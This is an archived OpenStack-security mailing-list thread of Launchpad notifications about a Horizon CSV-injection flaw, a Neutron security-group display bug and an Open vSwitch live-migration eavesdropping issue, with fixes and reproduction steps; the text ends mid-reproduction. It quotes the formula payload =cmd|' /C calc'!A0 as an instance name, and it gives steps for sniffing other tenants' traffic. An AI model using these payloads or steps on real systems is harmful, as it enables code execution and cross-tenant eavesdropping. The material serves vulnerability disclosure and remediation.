environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions From fungi at yuggoth.org Sat Oct 12 13:11:52 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Sat, 12 Oct 2019 13:11:52 -0000 Subject: [Openstack-security] [Bug 1842749] Re: CSV Injection Possible in Compute Usage History References: <156762575246.17155.15736064918343185075.malonedeb@gac.canonical.com> Message-ID: <157088591251.16308.15348820496788448299.malone@soybean.canonical.com> Thanks for the feedback everyone. We'll classify it as a security hardening opportunity in that case, no advisory needed. ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Public Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842749 Title: CSV Injection Possible in Compute Usage History Status in OpenStack Dashboard (Horizon): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: Many spreadsheet programs, such as Excel, LibreOffice, and OpenOffice, will parse and treat cells with special metacharacters as formulas. These programs can open comma-separated values (CSV) files and treat them as spreadsheets. If an attacker can influence the contents of CSV file, then that can allow the attacker to inject code that will execute when someone opens the CSV file through a spreadsheet program. In the Compute Overview panel in Horizon, there is a section titled “Usage Summary.” This section has a feature for downloading a CSV document of that usage summary. The contents of the CSV document include the name of the instances and other points of data such as its current state or how many resources it consumes. An attacker could create an instance with a malicious name beginning with an equals sign (=) or at sign (‘@’). These are both recognized in Excel as metacharacters for a formula. The attacker can create an instance name that includes a payload that will execute code such as: =cmd|' /C calc'!A0 This payload opens the calculator program when the resulting CSV is opened on a Windows machine with Microsoft Excel. An attacker could easily substitute this payload with another that runs any arbitrary shell commands. Reproduction Steps: 1. Access an OpenStack project, navigate to the Instances section. 2. Create an instance with the following name: =cmd|' /C calc'!A0 3. Navigate to the Overview section. 4. Refresh the page until the new instance shows up in the Usage list. 5. Click the button titled “DOWNLOAD CSV SUMMARY.” 6. Observe the generated CSV file. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842749/+subscriptions From 1842749 at bugs.launchpad.net Tue Oct 15 11:46:14 2019 From: 1842749 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 15 Oct 2019 11:46:14 -0000 Subject: [Openstack-security] [Bug 1842749] Re: CSV Injection Possible in Compute Usage History References: <156762575246.17155.15736064918343185075.malonedeb@gac.canonical.com> Message-ID: <157113997481.6588.11984873707371784222.malone@gac.canonical.com> Reviewed: https://review.opendev.org/679161 Committed: https://git.openstack.org/cgit/openstack/horizon/commit/?id=70629916fe32df61018fd122711e6b036b53c811 Submitter: Zuul Branch: master commit 70629916fe32df61018fd122711e6b036b53c811 Author: Adam Harwell Date: Wed Aug 28 16:59:06 2019 -0700 Use quoting for CSV Writing An attacker could create an instance with a malicious name beginning with an equals sign (=) or at sign (‘@’). These are both recognized in Excel as metacharacters for a formula. The attacker can create an instance name that includes a payload that will execute code such as: =cmd|' /C calc'!A0 This payload opens the calculator program when the resulting CSV is opened on a Windows machine with Microsoft Excel. An attacker could easily substitute this payload with another that runs any arbitrary shell commands. Quote the CSV output so this is no longer a possibility. Closes-Bug: #1842749 Change-Id: I937fa2a14bb483d87f057b3e8be219ecdc9363eb ** Changed in: horizon Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842749 Title: CSV Injection Possible in Compute Usage History Status in OpenStack Dashboard (Horizon): Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Many spreadsheet programs, such as Excel, LibreOffice, and OpenOffice, will parse and treat cells with special metacharacters as formulas. These programs can open comma-separated values (CSV) files and treat them as spreadsheets. If an attacker can influence the contents of CSV file, then that can allow the attacker to inject code that will execute when someone opens the CSV file through a spreadsheet program. In the Compute Overview panel in Horizon, there is a section titled “Usage Summary.” This section has a feature for downloading a CSV document of that usage summary. The contents of the CSV document include the name of the instances and other points of data such as its current state or how many resources it consumes. An attacker could create an instance with a malicious name beginning with an equals sign (=) or at sign (‘@’). These are both recognized in Excel as metacharacters for a formula. The attacker can create an instance name that includes a payload that will execute code such as: =cmd|' /C calc'!A0 This payload opens the calculator program when the resulting CSV is opened on a Windows machine with Microsoft Excel. An attacker could easily substitute this payload with another that runs any arbitrary shell commands. Reproduction Steps: 1. Access an OpenStack project, navigate to the Instances section. 2. Create an instance with the following name: =cmd|' /C calc'!A0 3. Navigate to the Overview section. 4. Refresh the page until the new instance shows up in the Usage list. 5. Click the button titled “DOWNLOAD CSV SUMMARY.” 6. Observe the generated CSV file. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842749/+subscriptions From 1824248 at bugs.launchpad.net Tue Oct 15 13:56:22 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 15 Oct 2019 13:56:22 -0000 Subject: [Openstack-security] [Bug 1824248] Fix proposed to neutron (stable/train) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <157114778301.9967.10897679269980648188.malone@chaenomeles.canonical.com> Fix proposed to branch: stable/train Review: https://review.opendev.org/688715 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Oct 15 13:56:45 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 15 Oct 2019 13:56:45 -0000 Subject: [Openstack-security] [Bug 1824248] Fix proposed to neutron (stable/stein) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <157114780559.5856.16922422978472638791.malone@gac.canonical.com> Fix proposed to branch: stable/stein Review: https://review.opendev.org/688716 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Oct 15 14:05:19 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 15 Oct 2019 14:05:19 -0000 Subject: [Openstack-security] [Bug 1824248] Fix proposed to neutron (stable/rocky) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <157114831947.10537.1321509755465082836.malone@chaenomeles.canonical.com> Fix proposed to branch: stable/rocky Review: https://review.opendev.org/688717 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From 1824248 at bugs.launchpad.net Tue Oct 15 14:11:17 2019 From: 1824248 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 15 Oct 2019 14:11:17 -0000 Subject: [Openstack-security] [Bug 1824248] Fix proposed to neutron (stable/queens) References: <155493822208.21486.11348171578680982627.malonedeb@soybean.canonical.com> Message-ID: <157114867720.10335.3339891317435727657.malone@chaenomeles.canonical.com> Fix proposed to branch: stable/queens Review: https://review.opendev.org/688719 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1824248 Title: Security Group filtering hides rules from user Status in neutron: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Manage Rules part of the GUI hides the rules currently visible in the Launch Instance modal window. It allows a malicious admin to add backdoor access rules that might be later added to VMs without the knowledge of owner of those VMs. When sending GET request as below, it responds only with the rules that are created by user and this happens when using Manage Rules part of the GUI: On the other hand when using GET request as below, it responds with all SG and it includes all rules, and there is no filtering and this is used in Launch Instance modal window: Here is example of rules display in Manage Rules part of GUI: > /opt/stack/horizon/openstack_dashboard/dashboards/project/security_groups/views.py(50)_get_data() -> return api.neutron.security_group_get(self.request, sg_id) (Pdb) l  45 @memoized.memoized_method  46 def _get_data(self):  47 sg_id = filters.get_int_or_uuid(self.kwargs['security_group_id'])  48 try:  49 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  50 -> return api.neutron.security_group_get(self.request, sg_id)  51 except Exception:  52 redirect = reverse('horizon:project:security_groups:index')  53 exceptions.handle(self.request,  54 _('Unable to retrieve security group.'),  55 redirect=redirect) (Pdb) p api.neutron.security_group_get(self.request, sg_id) , , , ]}> (Pdb) (Pdb) p self.request As you might have noticed there are no ports access 44 and 22 (SSH) And from the Launch Instance Modal Window, as well as CLI we can see that there are two more rules that are invisible for user, port 44 and 22 (SSH) as displayed below: > /opt/stack/horizon/openstack_dashboard/api/rest/network.py(47)get() -> return {'items': [sg.to_dict() for sg in security_groups]} (Pdb) l  42 """  43  44 security_groups = api.neutron.security_group_list(request)  45 from remote_pdb import RemotePdb; RemotePdb('127.0.0.1', 444).set_trace()  46  47 -> return {'items': [sg.to_dict() for sg in security_groups]}  48  49  50 @urls.register  51 class FloatingIP(generic.View):  52 """API for a single floating IP address.""" (Pdb) p security_groups [, , , , , ]}>] (Pdb) (Pdb) p request Thank you, Robin To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1824248/+subscriptions From obondarev at mirantis.com Fri Oct 18 12:43:59 2019 From: obondarev at mirantis.com (Oleg Bondarev) Date: Fri, 18 Oct 2019 12:43:59 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157140263950.18968.8867046367233779350.malone@gac.canonical.com> Should this bug be reopened for os-vif now when revert https://review.opendev.org/#/c/631829 was merged? @sean-k-mooney can you please share that status of this bug? Is there anything except neutron https://review.opendev.org/#/c/640258 and nova https://review.opendev.org/#/c/602432/ changes pending? -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From smooney at redhat.com Fri Oct 18 13:27:15 2019 From: smooney at redhat.com (sean mooney) Date: Fri, 18 Oct 2019 13:27:15 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157140523587.19842.8709570196447943419.malone@gac.canonical.com> there is a mitagation for this bug in all cases except when the ovs firewall driver is used with kernel ovs. https://review.opendev.org/#/c/631829 has not been reverted and there is no plans to revert it. it. https://review.opendev.org/#/c/612534/ was intoduced to add a config option to enable isolation. https://review.opendev.org/#/c/636061/ allows the caller of os-vif to determin if os-vif should plug the interface to the network backend. the nova change uses that abilty to delegate the plugging to os-vif instead of libvirt https://review.opendev.org/#/c/602432/13/nova/network/os_vif_util.py but we cannot do that until the neutron change is merged https://review.opendev.org/#/c/640258 i am not really activly workign on either patch right now. i tried to repoduce the dvr failutre locally but in my env it seams to work fine. we know from the upstream testing that in a non dvr env this seams to work fine. if some neutron dvr folks can try and fix the dvr issue that woudl move things forward but a few neutorn review have looked and we are not sure why this is broken. i think the issue is here https://review.opendev.org/#/c/640258/15/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_dvr_neutron_agent.py at 404 we are not looking at the correct field however i have not had tiem to actully debug this as i have been working on other issue. so to summarize the status form an os-vif point of view i consider this bug to be fixed. the nova fix is currently blocked by dvr support in the neutron patch. if you are using a configuration other than kernel ovs with the ovs firewall driver we believe this bug is fixed. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list 